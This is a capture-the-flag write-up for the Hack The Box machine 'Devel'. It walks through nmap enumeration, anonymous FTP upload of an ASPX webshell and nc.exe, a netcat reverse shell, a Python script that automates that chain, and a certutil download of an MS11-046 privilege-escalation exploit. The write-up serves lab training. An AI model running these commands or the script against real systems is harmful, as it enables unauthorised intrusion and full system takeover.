Devel

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.5 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Wed Mar  9 14:03:29 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.053s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

# Nmap done at Wed Mar  9 14:03:55 2022 -- 1 IP address (1 host up) scanned in 26.59 seconds

As we see, ports 21 (FTP) and 80 (HTTP) are open. Let's try to obtain more information about the services and versions running on those ports.

nmap -sC -sV -p21,80 10.10.10.5 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Wed Mar  9 14:04:31 2022 as: nmap -sCV -p21,80 -oN targeted 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.036s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar  9 14:04:40 2022 -- 1 IP address (1 host up) scanned in 9.27 seconds

If we take a look at the website, we won't see much.

We can see, by inspecting the website, that the image name is welcome.png.

</style>

</head>

<body>

<div id="container">

<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>

</div>

</body>

</html>

Now, let's inspect the FTP server, and try to log in as the anonymous user.

ftp 10.10.10.5

Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:alfa8sa): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp>

If we list the current directory, we'll see the welcome.png image we saw before.

ftp> ls

229 Entering Extended Passive Mode (|||49164|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

Exploitation

As the directory where the web page is located is the same as that of the FTP server, we could try to upload a webshell, so we could run commands. I will be using the /usr/share/davtest/backdoors/aspx_cmd.aspx webshell.

ftp> put aspx_cmd.aspx

local: aspx_cmd.aspx remote: aspx_cmd.aspx
229 Entering Extended Passive Mode (|||49554|)
125 Data connection already open; Transfer starting.
100% |************************************************************************************************************************************************************************************************|  1438       17.35 MiB/s    --:-- ETA
226 Transfer complete.
1438 bytes sent in 00:00 (28.46 KiB/s)

Let's also upload nc.exe to get a reverse shell, but activating the binary mode.

ftp> binary
ftp> put nc.exe

local: nc.exe remote: nc.exe
229 Entering Extended Passive Mode (|||49556|)
125 Data connection already open; Transfer starting.
100% |************************************************************************************************************************************************************************************************| 28306      277.68 KiB/s    --:-- ETA
226 Transfer complete.
28306 bytes sent in 00:00 (183.40 KiB/s)

If we access http://10.10.10.5/aspx_cmd.aspx we could execute commands.

Time to get a shell. Let's set a netcat listener on port 4444.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

To get a shell as the iis apppool\web user, we'll have to execute the nc.exe binary we uploaded via FTP. It is located in the default IIS web server directory at C:\inetpub\wwwroot.

C:\inetpub\wwwroot\nc.exe -e cmd 10.10.14.5 4444

listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.5] 49160
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

I made a python script to automate this whole process.

#!/usr/env python3

from pwn import *
import requests
from ftplib import FTP

def def_handler(sig, frame):
    print("[!] Leaving...")
    sys.exit(1)
    
#Ctrl+C
signal.signal(signal.SIGINT, def_handler)

host="10.10.10.5"
malicious_files = ["nc.exe", "aspx_cmd.aspx"]

def makeRequest():
    ftp = FTP(host)
    #ftp.set_debuglevel(1)
    ftp.login()
    for file in malicious_files:
        filename = open(file, 'rb')
        ftp.storbinary('STOR %s' % file, filename)
        filename.close()
    ftp.quit()

    s = requests.session()
    r = s.get('http://10.10.10.5/%s' % malicious_files[1])
    
    viewState = re.findall(r'__VIEWSTATE" value="(.*?)"', r.text)[0]
    eventValidation = re.findall(r'__EVENTVALIDATION" value="(.*?)"', r.text)[0]

    data = {
        '__VIEWSTATE': viewState,
        '__EVENTVALIDATION': eventValidation,
        'txtArg': 'C:\inetpub\wwwroot\%s -e cmd.exe 10.10.14.5 4444' % malicious_files[0],
        'testing': 'excute'
    }

    r = s.post('http://10.10.10.5/%s' % malicious_files[1], data=data)
    
if __name__ == '__main__':
    makeRequest()

Privilege Escalation

Let's list system information.

systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          10/3/2022, 12:00:51 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.492 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.557 MB
Virtual Memory: In Use:    584 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5
                                 [02]: fe80::58c0:f1cf:abc6:bb9e
                                 [03]: dead:beef::6968:51a1:b524:c56c
                                 [04]: dead:beef::58c0:f1cf:abc6:bb9e

At this point, I searched on the internet for exploits associated with 6.1.7600 N/A Build 7600, and found this exploit with the MS11-046 identifier. I searched for GitHub repositories associated with MS11-046 and found the ms11-046.exe binary. Let's transfer it to the victim machine.

python -m http.server

On the victim machine.

cd \windows\temp
certutil.exe -f -urlcache -split http://10.10.14.5:8000/ms11-046.exe ms11-046.exe

****  Online  ****
  000000  ...
  05a563
CertUtil: -URLCache command completed successfully.

If we execute the binary, we'll basically get a shell as the nt authority\system user. Then, all we have to do is reap the harvest and take both the user flag, and the root flag.

ms11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>type \users\babis\desktop\user.txt
type \users\babis\desktop\user.txt
20fae0df6cad82929c336d51b7e1072a

c:\Windows\System32>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
cf16ab18f858be3ed49061a2c4966e73

Last updated 2 years ago

Was this helpful?